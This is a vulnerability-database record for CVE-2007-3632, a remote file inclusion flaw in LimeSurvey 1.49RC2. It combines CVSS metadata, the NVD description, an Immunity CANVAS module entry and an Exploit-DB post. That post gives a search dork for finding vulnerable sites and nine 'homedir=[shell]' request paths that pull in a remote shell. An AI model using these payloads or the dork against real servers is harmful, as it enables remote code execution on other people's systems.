ID LIMESURVEY_INCLUDE
Type canvas
Reporter Immunity Canvas
Modified 2007-07-10T00:30:00
Description
Name| limesurvey_include
---|---
CVE| CVE-2007-3632
Exploit Pack| CANVAS
Description| LimeSurvey Include
Notes| CVSS: 6.8 <br> Repeatability: Infinite <br> VENDOR: Limesurvey.org <br> CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3632 <br> CVE Name: CVE-2007-3632
{"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-3632"]}, {"type": "exploitdb", "idList": ["EDB-ID:4156"]}], "modified": "2019-05-29T17:19:23", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2019-05-29T17:19:23", "rev": 2}, "vulnersScore": 7.1}, "reporter": "Immunity Canvas", "id": "LIMESURVEY_INCLUDE", "modified": "2007-07-10T00:30:00", "published": "2007-07-10T00:30:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": ["CVE-2007-3632"], "type": "canvas", "references": [], "description": "**Name**| limesurvey_include \n---|--- \n**CVE**| CVE-2007-3632 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| LimeSurvey Include \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: Limesurvey.org \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3632 \nCVE Name: CVE-2007-3632 \n\n", "title": "Immunity Canvas: LIMESURVEY_INCLUDE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/limesurvey_include", "lastseen": "2019-05-29T17:19:23", "edition": 2, "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:31:24", "description": "Multiple PHP remote file inclusion vulnerabilities in LimeSurvey (aka PHPSurveyor) 1.49RC2 allow remote attackers to execute arbitrary PHP code via a URL in the homedir parameter to (1) OLE/PPS/File.php, (2) OLE/PPS/Root.php, (3) Spreadsheet/Excel/Writer.php, or (4) OLE/PPS.php in admin/classes/pear/; or (5) Worksheet.php, (6) Parser.php, (7) Workbook.php, (8) Format.php, or (9) BIFFwriter.php in admin/classes/pear/Spreadsheet/Excel/Writer/.", "edition": 4, "cvss3": {}, "published": "2007-07-10T00:30:00", "title": "CVE-2007-3632", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-3632"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/a:limesurvey:limesurvey:1.49_rc2"], "id": "CVE-2007-3632", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3632", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:limesurvey:limesurvey:1.49_rc2:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T20:16:45", "description": "LimeSurvey (PHPSurveyor) 1.49RC2 Remote File Inclusion Vulnerability. CVE-2007-3632. 
Webapps exploit for php platform", "published": "2007-07-06T00:00:00", "type": "exploitdb", "title": "limesurvey phpsurveyor 1.49rc2 - Remote File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3632"], "modified": "2007-07-06T00:00:00", "id": "EDB-ID:4156", "href": "https://www.exploit-db.com/exploits/4156/", "sourceData": "## Owner : Pr0T3cT10n\n## Email : Pr0T3cT10n@Gmail.Com\n## Homepage : www.kamikaz-team.com\n## Script site : www.limesurvey.org\n## Script name : LimeSurvey (PHPSurveyor)\n## Version : 1.49RC2\n## Type : RFI(Remote File Include)\n## Source : http://sourceforge.net/project/showfiles.php?group_id=74605\n## D0rk : \"You have not provided a survey identification number\"\n\n## Bug :\n\t## Files :\n\t\t## /admin/classes/pear/OLE/PPS/File.php\n\t\t## /admin/classes/pear/OLE/PPS/Root.php\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer.php\n\t\t## /admin/classes/pear/OLE/PPS.php\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php\n\n## Exploit :\n\t\t## /admin/classes/pear/OLE/PPS/File.php?homedir=[shell]\n\t\t## /admin/classes/pear/OLE/PPS/Root.php?homedir=[shell]\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[shell]\n\t\t## /admin/classes/pear/OLE/PPS.php?homedir=[shell]\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[shell]\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[shell]\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[shell]\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[shell]\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[shell]\n\t\t\n## Thanks : str0ke\n\n# milw0rm.com 
[2007-07-06]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4156/"}]}